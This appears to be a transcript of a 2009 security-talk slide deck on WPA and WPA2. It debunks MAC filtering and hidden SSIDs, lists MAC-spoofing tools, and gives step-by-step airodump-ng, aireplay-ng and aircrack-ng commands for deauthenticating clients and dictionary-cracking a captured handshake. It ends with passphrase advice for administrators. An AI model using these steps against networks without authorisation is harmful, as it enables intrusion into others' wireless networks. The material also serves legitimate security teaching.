wpa
TRANSCRIPT
The A in WPA stands for Anarchy
Joshua Bedfordn0cturnal-labs.org 2009
The tool box
BackTrack3 (Can be booted off of USB, CD, or mounted under VMware.)BT3 supported Wi-Fi cards I use the AirLink101 - Awll3055 USB, and comes with a 10dbi antenna. Chipset is Zydas full supported with LinuxDictionary Password Attack (2.3gig dictionary file)
Extra hardware highly recommended
Alfa 500mW USB Wi-Fi Dongle (high-powered Usb Wi-Fi dongle fully supported under BT3) Has the option to use aftermarket antennas. RP-SMA Male to N Male Pigtail19dBi 24GHz Panel AntennaPasadena Networks carries both card and aftermarket antennas. I would highly recommend getting this gear.
WPA – What is it?
Wi-Fi Protected Access: A security protocol for wireless 802.11 networks- more or less a patch to fix the flawed WEP protocol. WPA provides additional security by:Requiring authentication using 802.1XRequiring re-keying using TKIP(Temporal Key Integrity)Augmenting the ICV (Integrity Check Value)with a MIC (Message Integrity Check), to protect the header as well as the payload Implementing a frame counter to discourage replay attacks as found in WEP
WPA2 – What is it?
(Wi-Fi Protected Access 2) provides network admins with a higher level of assurance that only authorized users can access the network. Based on the ratified IEEE 802.11i standard, WPA2 provides government grade security by implementing the National Institute of Standards and, Technology (NIST) FIPS 140-2 compliant AES encryption algorithm. Two different versions exist for WPA2, Personal and Enterprise. Personal protects unauthorized network access by utilizing a set-up password. Enterprise verifies network users through a server. WPA2 is backwards compatible with WPA.
Wireless Protection Myths
Mac Filtering
Mac address filtering is a approved listing of clients that are allowed to be associated to that specific AP or blacklisted.Mac address can be spoofed very easily
Mac Spoofing Tools
SMAC – WindowsMakeup Mac – WindowsMadMac – WindowsMacShift – WindowsEtherChange – WindowsTechnitium MAC Changer – WindowsGNUMacChanger - Linux
Hidden SSID’s
A hidden SSID is a non-broadcasting AP name. Most site surveying wireless applications will not display the hidden AP. We can grab the hidden SSID when a authorized pc on that network is booted up. This causes the wireless client to send a association request packet, to gain access to the AP. A few tools for both windows and Linux do exist that will display hidden SSID’s.Windows – AirMagnet and AirsnortLinux – Kismet, Airodump, and Airjack note: A port of Kismet for OSX exist called Kismac
Airodump – Hidden SSID
Kismet – Hidden SSID
Kismet – Hidden SSID
WPA known attacks
Deauthorization Attack
This attack can only be used if a legitimate client is connected to the AP of interest. Once the deauth attack is in motion, it tries to collect the legitimate handshake. This handshake can be dumped into a capture file, which can be used offline and cracked with either a Brute Force or Dictionary attack.
Deauthorization Attack
Command: airodump-ng eth1 (this will list all ap's select your target)
Deauthorization Attack
Command: airodump-ng -c (chan) -w (file name) --bssid (bssid) eth1
Deauthorization Attack
Command: aireplay-ng -0 5 -a (bssid) eth1Make note that airodump is still running in the background while we send the deauth attack. WPA handshake should pop up if all went well in the airodump-ng session
Deauthorization Attack
Now you can close Aireplay, it has popped the WPA handshake into the Airodump screen. Now note- where ever you run Airodump will also be where your capture file is located. Exit Airodump and follow the next set of instructions at the bash prompt.
Deauthorization Attack
aircrack-ng -w (dictionary file) (file name of .cap created by airdump)
Deauthorization Attack
KEYFOUND 1026 keys tested! BOOM!
Rainbow Table Attack
All this is a precompiled listing of the top 1000 SSID list from wigle.net , merging the Webster Dictionary and some common passwords to create this table. Thanks to the Church of WiFi
WPA PSK Rainbow table (Shmoo Group)
Note: This Rainbow Table Attack will only crack the defined AP’s in the Top 1000 SSID List.
Closing thoughts
So it’s all up to you, the Administrator to use longer passwords or passphrases with character substitution. This will make it much harder for a dictionary or brute force attack to work.
Shout outs!
deadhexbigdan[ruiner]cipherth0t
alpenht7zatmevild
n0cturnal-labs.orggrayscale-research.org